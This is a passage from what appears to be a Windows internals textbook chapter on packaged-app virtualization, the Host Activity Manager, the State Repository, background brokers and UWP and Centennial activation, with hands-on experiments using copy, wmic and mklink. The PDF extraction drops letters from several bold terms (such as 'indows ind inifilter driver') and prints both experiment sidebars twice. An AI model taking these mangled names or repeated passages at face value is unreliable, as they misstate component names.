subkey or value is stored only in the package hive that is stored in the following path: C:\ProgramData\
Packages\<PackageName>\<UserSid>\SystemAppData\Helium\Cache. Table 8-34 shows a summary of
the Registry virtualization applied to Centennial applications:
TABLE 8-34 Registry virtualization applied to Centennial applications
Operation
Result
Read or enumeration of HKEY_
LOCAL_MACHINE\Software
The operation returns a dynamic merge of the package hives with the local
system counterpart. Registry keys and values that exist in the package hives
always have precedence with respect to keys and values that already exist in
the local system.
All writes to HKEY_CURRENT_USER
Redirected to the Centennial package virtualized hive.
All writes inside the package
Writes to HKEY_LOCAL_MACHINE\Software are not allowed if a registry value
exists in one of the package hives.
All writes outside the package
Writes to HKEY_LOCAL_MACHINE\Software are allowed as long as the value
does not already exist in one of the package hives.
248
CHAPTER 8 System mechanisms
When the Centennial runtime sets up the Silo application container, it walks all the file and direc-
tories located into the VFS folder of the package. This procedure is part of the Centennial Virtual File
System configuration that the package activation provides. The Centennial runtime includes a list of
mapping for each folder located in the VFS directory, as shown in Table 8-35.
TABLE 8-35 List of system folders that are virtualized for Centennial apps
Folder Name
Redirection Target
Architecture
SystemX86
C:\Windows\SysWOW64
32-bit/64-bit
System
C:\Windows\System32
32-bit/64-bit
SystemX64
C:\Windows\System32
64-bit only
ProgramFilesX86
C:\Program Files (x86)
32-bit/64-bit
ProgramFilesX64
C:\Program Files
64-bit only
ProgramFilesCommonX86
C:\Program Files (x86)\Common Files
32-bit/64-bit
ProgramFilesCommonX64
C:\Program Files\Common Files
64-bit only
Windows
C:\Windows
Neutral
CommonAppData
C:\ProgramData
Neutral
The File System Virtualization is provided by three different drivers, which are heavily used for
Argon containers:
I
indows ind inifilter driver indlt Manages the redirection of the Centennial ap-
plication’s files. This means that if the Centennial app wants to read or write to one of its existing
virtualized files, the I/O is redirected to the file’s original position. When the application creates
instead a file on one of the virtualized folders (for example, in C:\Windows), and the file does
not already exist, the operation is allowed (assuming that the user has the needed permissions)
and the redirection is not applied.
I
indows Container solation inifilter driver cis Responsible for merging the
content of different virtualized folders (called layers) and creating a unique view. Centennial
applications use this driver to merge the content of the local user’s application data folder
(usually C:\Users\<UserName>\AppData) with the app’s application cache folder, located in C:\
User\<UserName>\Appdata\Local\Packages\<Package Full Name\LocalCache. The driver is
even able to manage the merge of multiple packages, meaning that each package can operate
on its own private view of the merged folders. To support this feature, the driver stores a Layer
ID of each package in the Reparse point of the target folder. In this way, it can construct a layer
map in memory and is able to operate on different private areas (internally called Scratch areas).
This advanced feature, at the time of this writing, is configured only for related set, a feature
described later in the chapter.
I
indows Container ae irtualiation inifilter driver cns While Wcifs driver
merges multiple folders, Wcnfs is used by Centennial to set up the name redirection of the local
user application data folder. Unlike from the previous case, when the app creates a new file or
folder in the virtualized application data folder, the file is stored in the application cache folder,
and not in the real one, regardless of whether the file already exists.
CHAPTER 8 System mechanisms
249
One important concept to keep in mind is that the BindFlt filter operates on single files, whereas Wcnfs
and Wcifs drivers operate on folders. Centennial uses minifilters’ communication ports to correctly set up
the virtualized file system infrastructure. The setup process is completed using a message-based commu-
nication system (where the Centennial runtime sends a message to the minifilter and waits for its re-
sponse). Table 8-36 shows a summary of the file system virtualization applied to Centennial applications.
TABLE 8-36 File system virtualization applied to Centennial applications
Operation
Result
Read or enumeration of a well-known
Windows folder
The operation returns a dynamic merge of the corresponding VFS folder with
the local system counterpart. File that exists in the VFS folder always had pre-
cedence with respect to files that already exist in the local system one.
Writes on the application data folder
All the writes on the application data folder are redirected to the local
Centennial application cache.
All writes inside the package folder
Forbidden, read-only.
All writes outside the package folder
Allowed if the user has permission.
The Host Activity Manager
Windows 10 has unified various components that were interacting with the state of a packaged ap-
plication in a noncoordinated way. As a result, a brand-new component, called Host Activity Manager
(HAM) became the central component and the only one that manages the state of a packaged applica-
tion and exposes a unified API set to all its clients.
Unlike its predecessors, the Host Activity Manager exposes activity-based interfaces to its clients.
A host is the object that represents the smallest unit of isolation recognized by the Application model.
Resources, suspend/resume and freeze states, and priorities are managed as a single unit, which usu-
ally corresponds to a Windows Job object representing the packaged application. The job object may
contain only a single process for simple applications, but it could contain even different processes for
applications that have multiple background tasks (such as multimedia players, for example).
In the new Modern Application Model, there are three job types:
I
Mixed A mix of foreground and background activities but typically associated with the fore-
ground part of the application. Applications that include background tasks (like music playing
or printing) use this kind of job type.
I
Pure A host that is used for purely background work.
I
ste A host that executes Windows code on behalf of the application (for example, back-
ground downloads).
An activity always belongs to a host and represents the generic interface for client-specific concepts
such as windows, background tasks, task completions, and so on. A host is considered “Active” if its
job is unfrozen and it has at least one running activity. The HAM clients are components that interact
and control the lifetime of activities. Multiple components are HAM clients: View Manager, Broker
Infrastructure, various Shell components (like the Shell Experience Host), AudioSrv, Task completions,
and even the Windows Service Control Manager.
250
CHAPTER 8 System mechanisms
The Modern application’s lifecycle consists of four states: running, suspending, suspend-complete,
and suspended (states and their interactions are shown in Figure 8-43.)
I
Running The state where an application is executing part of its code, other than when it's
suspending. An application could be in “running” state not only when it is in a foreground state
but even when it is running background tasks, playing music, printing, or any number of other
background scenarios.
I
Suspending This state represents a time-limited transition state that happens where HAM
asks the application to suspend. HAM can do this for different reasons, like when the applica-
tion loses the foreground focus, when the system has limited resources or is entering a battery-
safe mode, or simply because an app is waiting for some UI event. When this happens, an
app has a limited amount of time to go to the suspended state (usually 5 seconds maximum);
otherwise, it will be terminated.
I
SuspendComplete This state represents an application that has finished suspending and
notifies the system that it is done. Therefore, its suspend procedure is considered completed.
I
Suspended Once an app completes suspension and notifies the system, the system freez-
es the application’s job object using the NtSetInformationJobObject API call (through the
JobObjectFreezeInformation information class) and, as a result, none of the app code can run.
Suspending
Running
(Active)
Suspended
(Halted)
SuspendComplete
FIGURE 8-43 Scheme of the lifecycle of a packaged application.
With the goal of preserving system efficiency and saving system resources, the Host Activity
Manager by default will always require an application to suspend. HAM clients need to require keep-
ing an application alive to HAM. For foreground applications, the component responsible in keeping
the app alive is the View Manager. The same applies for background tasks: Broker Infrastructure is the
component responsible for determining which process hosting the background activity should remain
alive (and will request to HAM to keep the application alive).
Packaged applications do not have a Terminated state. This means that an application does not
have a real notion of an Exit or Terminate state and should not try to terminate itself. The actual model
for terminating a Packaged application is that first it gets suspended, and then HAM, if required, calls
NtTerminateJobObject API on the application's job object. HAM automatically manages the app life-
time and destroys the process only as needed. HAM does not decide itself to terminate the application;
instead, its clients are required to do so (the View Manager or the Application Activation Manager are
good examples). A packaged application can’t distinguish whether it has been suspended or termi-
nated. This allows Windows to automatically restore the previous state of the application even if it has
been terminated or if the system has been rebooted. As a result, the packaged application model is
completely different from the standard Win32 application model.
CHAPTER 8 System mechanisms
251
To properly suspend and resume a Packaged application, the Host Activity manager uses the new
PsFreezeProcess and PsThawProcess kernel APIs. The process Freeze and Thaw operations are similar to
suspend and resume, with the following two major differences:
I
A new thread that is injected or created in a context of a deep-frozen process will not
run even in case the CREATE_SUSPENDED flag is not used at creation time or in case the
NtResumeProcess API is called to start the thread.
I
A new Freeze counter is implemented in the EPROCESS data structures. This means that a pro-
cess could be frozen multiple times. To allow a process to be thawed, the total number of thaw
requests must be equal to the number of freeze requests. Only in this case are all the nonsus-
pended threads allowed to run.
The State Repository
The Modern Application Model introduces a new way for storing packaged applications’ settings,
package dependencies, and general application data. The State Repository is the new central store
that contains all this kind of data and has an important central rule in the management of all modern
applications: Every time an application is downloaded from the store, installed, activated, or removed,
new data is read or written to the repository. The classical usage example of the State Repository is
represented by the user clicking on a tile in the Start menu. The Start menu resolves the full path of
the application’s activation file (which could be an EXE or a DLL, as already seen in Chapter 7 of Part 1),
reading from the repository. (This is actually simplified, because the ShellExecutionHost process enu-
merates all the modern applications at initialization time.)
The State Repository is implemented mainly in two libraries: Windows.StateRepository.dll and
Windows.StateRepositoryCore.dll. Although the State Repository Service runs the server part of the
repository, UWP applications talk with the repository using the Windows.StateRepositoryClient.dll
library. (All the repository APIs are full trust, so WinRT clients need a Proxy to correctly communicate
with the server. This is the rule of another DLL, named Windows.StateRepositoryPs.dll.) The root loca-
tion of the State Repository is stored in the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\
Appx\ PackageRepositoryRoot registry value, which usually points to the C:\ProgramData\Microsoft\
Windows\ AppRepository path.
The State Repository is implemented across multiple databases, called partitions. Tables in the data-
base are called entities. Partitions have different access and lifetime constraints:
I
Machine This database includes package definitions, an application’s data and identities, and
primary and secondary tiles (used in the Start menu), and it is the master registry that defines
who can access which package. This data is read extensively by different components (like
the TileDataRepository library, which is used by Explorer and the Start menu to manage the
different tiles), but it’s written primarily by the AppX deployment (rarely by some other minor
components). The Machine partition is usually stored in a file called StateRepository-Machine.
srd located into the state repository root folder.
I
eploent Stores machine-wide data mostly used only by the deployment service
(AppxSvc) when a new package is registered or removed from the system. It includes the
252
CHAPTER 8 System mechanisms
applications file list and a copy of each modern application’s manifest file. The Deployment
partition is usually stored in a file called StateRepository-Deployment.srd.
All partitions are stored as SQLite databases. Windows compiles its own version of SQLite into the
StateRepository.Core.dll library. This library exposes the State Repository Data Access Layer (also known
as DAL) APIs that are mainly wrappers to the internal database engine and are called by the State
Repository service.
Sometimes various components need to know when some data in the State Repository is written
or modified. In Windows 10 Anniversary update, the State Repository has been updated to support
changes and events tracking. It can manage different scenarios:
I
A component wants to subscribe for data changes for a certain entity. The component receives
a callback when the data is changed and implemented using a SQL transaction. Multiple SQL
transactions are part of a Deployment operation. At the end of each database transaction,
the State Repository determines if a Deployment operation is completed, and, if so, calls each
registered listener.
I
A process is started or wakes from Suspend and needs to discover what data has changed since
it was last notified or looked at. State Repository could satisfy this request using the ChangeId
field, which, in the tables that supports this feature, represents a unique temporal identifier
of a record.
I
A process retrieves data from the State Repository and needs to know if the data has changed
since it was last examined. Data changes are always recorded in compatible entities via a new
table called Changelog. The latter always records the time, the change ID of the event that cre-
ated the data, and, if applicable, the change ID of the event that deleted the data.
The modern Start menu uses the changes and events tracking feature of the State Repository to work
properly. Every time the ShellExperienceHost process starts, it requests the State Repository to notify
its controller (NotificationController.dll) every time a tile is modified, created, or removed. When the
user installs or removes a modern application through the Store, the application deployment server
executes a DB transaction for inserting or removing the tile. The State Repository, at the end of the
transaction, signals an event that wakes up the controller. In this way, the Start menu can modify its ap-
pearance almost in real time.
Note In a similar way, the modern Start menu is automatically able to add or remove an
entry for every new standard Win32 application installed. The application setup program
usually creates one or more shortcuts in one of the classic Start menu folder locations
(systemwide path: C:\ProgramData\Microsoft\ Windows\Start Menu, or per-user path:
C:\Users\<UserName>\AppData\Roaming\Microsoft\Windows\Start Menu). The modern
Start menu uses the services provided by the AppResolver library to register file system
notifications on all the Start menu folders (through the ReadDirectoryChangesW Win32 API).
In this way, whenever a new shortcut is created in the monitored folders, the library can get
a callback and signal the Start menu to redraw itself.
CHAPTER 8 System mechanisms
253
EXPERIMENT: Witnessing the state repository
You can open each partition of the state repository fairly easily using your preferred SQLite
browser application. For this experiment, you need to download and install an SQLite browser,
like the open-source DB Browser for SQLite, which you can download from http://sqlitebrowser.
org/. The State Repository path is not accessible by standard users. Furthermore, each parti-
tion’s file could be in use in the exact moment that you will access it. Thus, you need to copy
the database file in another folder before trying to open it with the SQLite browser. Open
an administrative command prompt (by typing cmd in the Cortana search box and select-
ing Run As Administrator after right-clicking the Command Prompt label) and insert the
following commands:
C:\WINDOWS\system32>cd “C:\ProgramData\Microsoft\Windows\AppRepository”
C:\ProgramData\Microsoft\Windows\AppRepository>copy StateRepository-Machine.srd
"%USERPROFILE%\Documents"
In this way, you have copied the State Repository machine partition into your Documents
folder. The next stage is to open it. Start DB Browser for SQLite using the link created in the
Start menu or the Cortana search box and click the Open Database button. Navigate to the
Documents folder, select All Files (*) in the ile pe combo box (the state repository database
doesn’t use a standard SQLite file extension), and open the copied StateRepository-machine.
EXPERIMENT: Witnessing the state repository
You can open each partition of the state repository fairly easily using your preferred SQLite
browser application. For this experiment, you need to download and install an SQLite browser,
like the open-source DB Browser for SQLite, which you can download from http://sqlitebrowser.
org/. The State Repository path is not accessible by standard users. Furthermore, each parti
org/. The State Repository path is not accessible by standard users. Furthermore, each parti
org/
-
tion’s file could be in use in the exact moment that you will access it. Thus, you need to copy
the database file in another folder before trying to open it with the SQLite browser. Open
an administrative command prompt (by typing cmd in the Cortana search box and select-
ing Run As Administrator after right-clicking the Command Prompt label) and insert the
following commands:
C:\WINDOWS\system32>cd “C:\ProgramData\Microsoft\Windows\AppRepository”
C:\ProgramData\Microsoft\Windows\AppRepository>copy StateRepository-Machine.srd
"%USERPROFILE%\Documents"
In this way, you have copied the State Repository machine partition into your Documents
folder. The next stage is to open it. Start DB Browser for SQLite using the link created in the
Start menu or the Cortana search box and click the Open Database button. Navigate to the
Documents folder, select All Files (*) in the ile pe combo box (the state repository database
doesn’t use a standard SQLite file extension), and open the copied StateRepository-machine.
254
CHAPTER 8 System mechanisms
srd file. The main view of DB Browser for SQLite is the database structure. For this experiment
you need to choose the Browse Data sheet and navigate through the tables like Package,
Application, PackageLocation, and PrimaryTile.
The Application Activation Manager and many other components of the Modern Application
Model use standard SQL queries to extract the needed data from the State Repository. For ex-
ample, to extract the package location and the executable name of a modern application, a SQL
query like the following one could be used:
SELECT p.DisplayName, p.PackageFullName, pl.InstalledLocation, a.Executable, pm.Name
FROM Package AS p
INNER JOIN PackageLocation AS pl ON p._PackageID=pl.Package
INNER JOIN PackageFamily AS pm ON p.PackageFamily=pm._PackageFamilyID
INNER JOIN Application AS a ON a.Package=p._PackageID
WHERE pm.PackageFamilyName="<Package Family Name>"
The DAL (Data Access Layer) uses similar queries to provide services to its clients.
You can annotate the total number of records in the table and then install a new application
from the store. If, after the deployment process is completed, you again copy the database file,
you will find that number of the records change. This happens in multiple tables. Especially if the
new app installs a new tile, even the PrimaryTile table adds a record for the new tile shown in the
Start menu.
srd file. The main view of DB Browser for SQLite is the database structure. For this experiment
you need to choose the Browse Data sheet and navigate through the tables like Package,
Application, PackageLocation, and PrimaryTile.
The Application Activation Manager and many other components of the Modern Application
Model use standard SQL queries to extract the needed data from the State Repository. For ex-
ample, to extract the package location and the executable name of a modern application, a SQL
query like the following one could be used:
SELECT p.DisplayName, p.PackageFullName, pl.InstalledLocation, a.Executable, pm.Name
FROM Package AS p
INNER JOIN PackageLocation AS pl ON p._PackageID=pl.Package
INNER JOIN PackageFamily AS pm ON p.PackageFamily=pm._PackageFamilyID
INNER JOIN Application AS a ON a.Package=p._PackageID
WHERE pm.PackageFamilyName="<Package Family Name>"
The DAL (Data Access Layer) uses similar queries to provide services to its clients.
You can annotate the total number of records in the table and then install a new application
from the store. If, after the deployment process is completed, you again copy the database file,
you will find that number of the records change. This happens in multiple tables. Especially if the
new app installs a new tile, even the PrimaryTile table adds a record for the new tile shown in the
Start menu.
CHAPTER 8 System mechanisms
255
The Dependency Mini Repository
Opening an SQLite database and extracting the needed information through an SQL query could be
an expensive operation. Furthermore, the current architecture requires some interprocess communica-
tion done through RPC. Those two constraints sometimes are too restrictive to be satisfied. A classic
example is represented by a user launching a new application (maybe an Execution Alias) through the
command-line console. Checking the State Repository every time the system spawns a process intro-
duces a big performance issue. To fix these problems, the Application Model has introduced another
smaller store that contains Modern applications’ information: the Dependency Mini Repository (DMR).
Unlike from the State Repository, the Dependency Mini Repository does not make use of any
database but stores the data in a Microsoft-proprietary binary format that can be accessed by any file
system in any security context (even a kernel-mode driver could possibly parse the DMR data). The
System Metadata directory, which is represented by a folder named Packages in the State Repository
root path, contains a list of subfolders, one for every installed package. The Dependency Mini Repository
is represented by a .pckgdep file, named as the user’s SID. The DMR file is created by the Deployment
service when a package is registered for a user (for further details, see the “Package registration” sec-
tion later in this chapter).
The Dependency Mini Repository is heavily used when the system creates a process that belongs to
a packaged application (in the AppX Pre-CreateProcess extension). Thus, it’s entirely implemented in
the Win32 kernelbase.dll (with some stub functions in kernel.appcore.dll). When a DMR file is opened
at process creation time, it is read, parsed, and memory-mapped into the parent process. After the
child process is created, the loader code maps it even in the child process. The DMR file contains vari-
ous information, including
I
Package information, like the ID, full name, full path, and publisher
I
Application information: application user model ID and relative ID, description, display name,
and graphical logos
I
Security context: AppContainer SID and capabilities
I
Target platform and the package dependencies graph (used in case a package depends on one
or more others)
The DMR file is designed to contain even additional data in future Windows versions, if required.
Using the Dependency Mini Repository file, the process creation is fast enough and does not require a
query into the State Repository. Noteworthy is that the DMR file is closed after the process creation. So,
it is possible to rewrite the .pckgdep file, adding an optional package even when the Modern applica-
tion is executing. In this way, the user can add a feature to its modern application without restarting
it. Some small parts of the package mini repository (mostly only the package full name and path) are
replicated into different registry keys as cache for a faster access. The cache is often used for common
operations (like understanding if a package exists).
256
CHAPTER 8 System mechanisms
Background tasks and the Broker Infrastructure
UWP applications usually need a way to run part of their code in the background. This code doesn’t
need to interact with the main foreground process. UWP supports background tasks, which provide
functionality to the application even when the main process is suspended or not running. There are
multiple reasons why an application may use background tasks: real-time communications, mails, IM,
multimedia music, video player, and so on. A background task could be associated by triggers and
conditions. A trigger is a global system asynchronous event that, when it happens, signals the starting
of a background task. The background task at this point may or may be not started based on its applied
conditions. For example, a background task used in an IM application could start only when the user
logs on (a system event trigger) and only if the Internet connection is available (a condition).
In Windows 10, there are two types of background tasks:
I
In-process background task The application code and its background task run in the same
process. From a developer’s point of view, this kind of background task is easier to implement, but
it has the big drawback that if a bug hits its code, the entire application crashes. The in-process
background task doesn’t support all triggers available for the out-of-process background tasks.
I
Out-of-process background task The application code and its background task run in dif-
ferent processes (the process could run in a different job object, too). This type of background
task is more resilient, runs in the backgroundtaskhost.exe host process, and can use all the trig-
gers and the conditions. If a bug hits the background task, this will never kill the entire applica-
tion. The main drawback is originated from the performance of all the RPC code that needs to
be executed for the interprocess communication between different processes.
To provide the best user experience for the user, all background tasks have an execution time
limit of 30 seconds total. After 25 seconds, the Background Broker Infrastructure service calls the
task’s Cancellation handler (in WinRT, this is called OnCanceled event). When this event happens,
the background task still has 5 seconds to completely clean up and exit. Otherwise, the process that
contains the Background Task code (which could be BackgroundTaskHost.exe in case of out-of-pro-
cess tasks; otherwise, it’s the application process) is terminated. Developers of personal or business
UWP applications can remove this limit, but such an application could not be published in the official
Microsoft Store.
The Background Broker Infrastructure (BI) is the central component that manages all the
Background tasks. The component is implemented mainly in bisrv.dll (the server side), which lives in
the Broker Infrastructure service. Two types of clients can use the services provided by the Background
Broker Infrastructure: Standard Win32 applications and services can import the bi.dll Background Broker
Infrastructure client library; WinRT applications always link to biwinrt.dll, the library that provides WinRT
APIs to modern applications. The Background Broker Infrastructure could not exist without the brokers.
The brokers are the components that generate the events that are consumed by the Background Broker
Server. There are multiple kinds of brokers. The most important are the following:
I
ste Event roer Provides triggers for system events like network connections’ state
changes, user logon and logoff, system battery state changes, and so on
I
Time Broker Provides repetitive or one-shot timer support
CHAPTER 8 System mechanisms
257
I
Network Connection Broker Provides a way for the UWP applications to get an event when
a connection is established on certain ports
I
Device Services Broker Provides device arrivals triggers (when a user connects or discon-
nects a device). Works by listening Pnp events originated from the kernel
I
Mobile Broad Band Experience Broker Provides all the critical triggers for phones and SIMs
The server part of a broker is implemented as a windows service. The implementation is different
for every broker. Most work by subscribing to WNF states (see the “Windows Notification Facility” sec-
tion earlier in this chapter for more details) that are published by the Windows kernel; others are built
on top of standard Win32 APIs (like the Time Broker). Covering the implementation details of all the
brokers is outside the scope of this book. A broker can simply forward events that are generated some-
where else (like in the Windows kernel) or can generates new events based on some other conditions
and states. Brokers forward events that they managed through WNF: each broker creates a WNF state
name that the background infrastructure subscribes to. In this way, when the broker publishes new
state data, the Broker Infrastructure, which is listening, wakes up and forwards the event to its clients.
Each broker includes even the client infrastructure: a WinRT and a Win32 library. The Background
Broker Infrastructure and its brokers expose three kinds of APIs to its clients:
I
Non-trust APIs Usually used by WinRT components that run under AppContainer or in
a sandbox environment. Supplementary security checks are made. The callers of this kind
of API can’t specify a different package name or operate on behalf of another user (that is,
BiRtCreateEventForApp).
I
Partial-trust APIs Used by Win32 components that live in a Medium-IL environment. Callers
of this kind of API can specify a Modern application’s package full name but can’t operate on
behalf of another user (that is, BiPtCreateEventForApp).
I
Full-trust API Used only by high-privileged system or administrative Win32 services. Callers
of these APIs can operate on behalf of different users and on different packages (that is,
BiCreateEventForPackageName).
Clients of the brokers can decide whether to subscribe directly to an event provided by the
specific broker or subscribe to the Background Broker Infrastructure. WinRT always uses the latter
method. Figure 8-44 shows an example of initialization of a Time trigger for a Modern Application
Background task.
UWP
Application
(Imports BiWinRt.dll)
Win32
KernelBase
(Imports BrokerLib.dll)
Notifies the app
(if needed)
RPC
Communication
BiRtCreateEvent
ForApp
+Callback
CreateBrokerEvent
SetWaitableTimer
Timer fires, Callback is called:
Publish new WNF state data
Starts the
Background Task
Subscribe
WNF state
BrokerInfracture
Time Broker
Server
Background Task
Host
WNF
FIGURE 8-44 Architecture of the Time Broker.
258
CHAPTER 8 System mechanisms
Another important service that the Background Broker Infrastructure provides to the Brokers
and to its clients is the storage capability for background tasks. This means that when the user shuts
down and then restarts the system, all the registered background tasks are restored and rescheduled
as before the system was restarted. To achieve this properly, when the system boots and the Service
Control Manager (for more information about the Service Control Manager, refer to Chapter 10) starts
the Broker Infrastructure service, the latter, as a part of its initialization, allocates a root storage GUID,
and, using NtLoadKeyEx native API, loads a private copy of the Background Broker registry hive. The
service tells NT kernel to load a private copy of the hive using a special flag (REG_APP_HIVE). The
BI hive resides in the C:\Windows\System32\Config\BBI file. The root key of the hive is mounted as
\Registry\A\<Root Storage GUID> and is accessible only to the Broker Infrastructure service’s process
(svchost.exe, in this case; Broker Infrastructure runs in a shared service host). The Broker Infrastructure
hive contains a list of events and work items, which are ordered and identified using GUIDs:
I
An event represents a Background task’s trigger It is associated with a broker ID (which
represents the broker that provides the event type), the package full name, and the user of the
UWP application that it is associated with, and some other parameters.
I
A work item represents a scheduled Background task It contains a name, a list of condi-
tions, the task entry point, and the associated trigger event GUID.
The BI service enumerates each subkey and then restores all the triggers and background tasks. It
cleans orphaned events (the ones that are not associated with any work items). It then finally publishes
a WNF ready state name. In this way, all the brokers can wake up and finish their initialization.
The Background Broker Infrastructure is deeply used by UWP applications. Even regular Win32
applications and services can make use of BI and brokers, through their Win32 client libraries. Some
notable examples are provided by the Task Scheduler service, Background Intelligent Transfer service,
Windows Push Notification service, and AppReadiness.
Packaged applications setup and startup
Packaged application lifetime is different than standard Win32 applications. In the Win32 world,
the setup procedure for an application can vary from just copying and pasting an executable file to
executing complex installation programs. Even if launching an application is just a matter of running
an executable file, the Windows loader takes care of all the work. The setup of a Modern application is
instead a well-defined procedure that passes mainly through the Windows Store. In Developer mode,
an administrator is even able to install a Modern application from an external .Appx file. The package
file needs to be digitally signed, though. This package registration procedure is complex and involves
multiple components.
Before digging into package registration, it’s important to understand another key concept that
belongs to Modern applications: package activation. Package activation is the process of launching a
Modern application, which can or cannot show a GUI to the user. This process is different based on the
type of Modern application and involves various system components.
CHAPTER 8 System mechanisms
259
Package activation
A user is not able to launch a UWP application by just executing its .exe file (excluding the case of the
new AppExecution aliases, created just for this reason. We describe AppExecution aliases later in this
chapter). To correctly activate a Modern application, the user needs to click a tile in the modern menu,
use a special link file that Explorer is able to parse, or use some other activation points (double-click
an application’s document, invoke a special URL, and so on). The ShellExperienceHost process decides
which activation performs based on the application type.
UWP applications
The main component that manages this kind of activation is the Activation Manager, which is imple-
mented in ActivationManager.dll and runs in a sihost.exe service because it needs to interact with the
user’s desktop. The activation manager strictly cooperates with the View Manager. The modern menu
calls into the Activation Manager through RPC. The latter starts the activation procedure, which is sche-
matized in Figure 8-45:
I
Gets the SID of the user that is requiring the activation, the package family ID, and PRAID of the
package. In this way, it can verify that the package is actually registered in the system (using the
Dependency Mini Repository and its registry cache).
I
If the previous check yields that the package needs to be registered, it calls into the AppX
Deployment client and starts the package registration. A package might need to be registered
in case of “on-demand registration,” meaning that the application is downloaded but not
completely installed (this saves time, especially in enterprise environments) or in case the ap-
plication needs to be updated. The Activation Manager knows if one of the two cases happens
thanks to the State Repository.
I
It registers the application with HAM and creates the HAM host for the new package and its
initial activity.
I
Activation Manager talks with the View Manager (through RPC), with the goal of initializing the
GUI activation of the new session (even in case of background activations, the View Manager
always needs to be informed).
I
The activation continues in the DcomLaunch service because the Activation Manager at this
stage uses a WinRT class to launch the low-level process creation.
I
The DcomLaunch service is responsible in launching COM, DCOM, and WinRT servers in re-
sponse to object activation requests and is implemented in the rpcss.dll library. DcomLaunch
captures the activation request and prepares to call the CreateProcessAsUser Win32 API. Before
doing this, it needs to set the proper process attributes (like the package full name), ensure
that the user has the proper license for launching the application, duplicate the user token, set
the low integrity level to the new one, and stamp it with the needed security attributes. (Note
that the DcomLaunch service runs under a System account, which has TCB privilege. This kind
of token manipulation requires TCB privilege. See Chapter 7 of Part 1 for further details.) At this
point, DcomLaunch calls CreateProcessAsUser, passing the package full name through one of
the process attributes. This creates a suspended process.
260
CHAPTER 8 System mechanisms
I
The rest of the activation process continues in Kernelbase.dll. The token produced by
DcomLaunch is still not an AppContainer but contains the UWP Security attributes. A Special
code in the CreateProcessInternal function uses the registry cache of the Dependency Mini
Repository to gather the following information about the packaged application: Root Folder,
Package State, AppContainer package SID, and list of application’s capabilities. It then verifies
that the license has not been tampered with (a feature used extensively by games). At this point,
the Dependency Mini Repository file is mapped into the parent process, and the UWP applica-
tion DLL alternate load path is resolved.
I
The AppContainer token, its object namespace, and symbolic links are created with the
BasepCreateLowBox function, which performs the majority of the work in user mode, except for
the actual AppContainer token creation, which is performed using the NtCreateLowBoxToken
kernel function. We have already covered AppContainer tokens in Chapter 7 of Part 1.
I
The kernel process object is created as usual by using NtCreateUserProcess kernel API.
I
After the CSRSS subsystem has been informed, the BasepPostSuccessAppXExtension function
maps the Dependency Mini Repository in the PEB of the child process and unmaps it from the
parent process. The new process can then be finally started by resuming its main thread.
NT Kernel
Modern Start Menu
(ShellExperienceHost.exe
Activation
Manager
Host Activity
Manager (HAM)
View
Manager
WinRT Activation
Sets process attributes
Checks license
Duplicates and stamps the token
Calls CreateProcessAsUser
State Repository
Dependency Mini Repository
Initializes the GUI
Creates HAM host and
Activity
Read package information
and AppContainer data
Checks if package
exists and is
registered
Process Creation
AppContainer Environment setup
AppContainer token creation
KernelBase.dll
DComLaunch
FIGURE 8-45 Scheme of the activation of a modern UWP application.
CHAPTER 8 System mechanisms
261
Centennial applications
The Centennial applications activation process is similar to the UWP activation but is implemented
in a totally different way. The modern menu, ShellExperienceHost, always calls into Explorer.exe for
this kind of activation. Multiple libraries are involved in the Centennial activation type and mapped in
Explorer, like Daxexec.dll, Twinui.dll, and Windows.Storage.dll. When Explorer receives the activation
request, it gets the package full name and application id, and, through RPC, grabs the main application
executable path and the package properties from the State Repository. It then executes the same steps
(2 through 4) as for UWP activations. The main difference is that, instead of using the DcomLaunch
service, Centennial activation, at this stage, it launches the process using the ShellExecute API of the
Shell32 library. ShellExecute code has been updated to recognize Centennial applications and to use
a special activation procedure located in Windows.Storage.dll (through COM). The latter library uses
RPC to call the RAiLaunchProcessWithIdentity function located in the AppInfo service. AppInfo uses the
State Repository to verify the license of the application, the integrity of all its files, and the calling pro-
cess’s token. It then stamps the token with the needed security attributes and finally creates the process
in a suspended state. AppInfo passes the package full name to the CreateProcessAsUser API using the
PROC_THREAD_ATTRIBUTE_PACKAGE_FULL_NAME process attribute.
Unlike the UWP activation, no AppContainer is created at all, AppInfo calls the PostCreateProcess
DesktopAppXActivation function of DaxExec.dll, with the goal of initializing the virtualization layer of
Centennial applications (registry and file system). Refer to the “Centennial application” section earlier in
this chapter for further information.
EXPERIMENT: Activate Modern apps through the command line
In this experiment, you will understand better the differences between UWP and Centennial, and
you will discover the motivation behind the choice to activate Centennial applications using the
ShellExecute API. For this experiment, you need to install at least one Centennial application. At
the time of this writing, a simple method to recognize this kind of application exists by using the
Windows Store. In the store, after selecting the target application, scroll down to the “Additional
Information” section. If you see “This app can: Uses all system resources,” which is usually located
before the “Supported languages” part, it means that the application is Centennial type.
In this experiment, you will use Notepad++. Search and install the “(unofficial) Notepad++”
application from the Windows Store. Then open the Camera application and Notepad++. Open
an administrative command prompt (you can do this by typing cmd in the Cortana search box
and selecting Run As Administrator after right-clicking the Command Prompt label). You need to
find the full path of the two running packaged applications using the following commands:
wmic process where "name='WindowsCamera.exe'" get ExecutablePath
wmic process where "name='notepad++.exe’" get ExecutablePath
EXPERIMENT: Activate Modern apps through the command line
In this experiment, you will understand better the differences between UWP and Centennial, and
you will discover the motivation behind the choice to activate Centennial applications using the
ShellExecute API. For this experiment, you need to install at least one Centennial application. At
the time of this writing, a simple method to recognize this kind of application exists by using the
Windows Store. In the store, after selecting the target application, scroll down to the “Additional
Information” section. If you see “This app can: Uses all system resources,” which is usually located
before the “Supported languages” part, it means that the application is Centennial type.
In this experiment, you will use Notepad++. Search and install the “(unofficial) Notepad++”
application from the Windows Store. Then open the Camera application and Notepad++. Open
an administrative command prompt (you can do this by typing cmd in the Cortana search box
and selecting Run As Administrator after right-clicking the Command Prompt label). You need to
find the full path of the two running packaged applications using the following commands:
wmic process where "name='WindowsCamera.exe'" get ExecutablePath
wmic process where "name='notepad++.exe’" get ExecutablePath
262
CHAPTER 8 System mechanisms
Now you can create two links to the application’s executables using the commands:
mklink "%USERPROFILE%\Desktop\notepad.exe" "<Notepad++ executable Full Path>"
mklink "%USERPROFILE%\Desktop\camera.exe" "<WindowsCamera executable full path>
replacing the content between the < and > symbols with the real executable path discovered
by the first two commands.
You can now close the command prompt and the two applications. You should have created
two new links in your desktop. Unlike with the Notepad.exe link, if you try to launch the Camera
application from your desktop, the activation fails, and Windows returns an error dialog box like
the following:
This happens because Windows Explorer uses the Shell32 library to activate executable links.
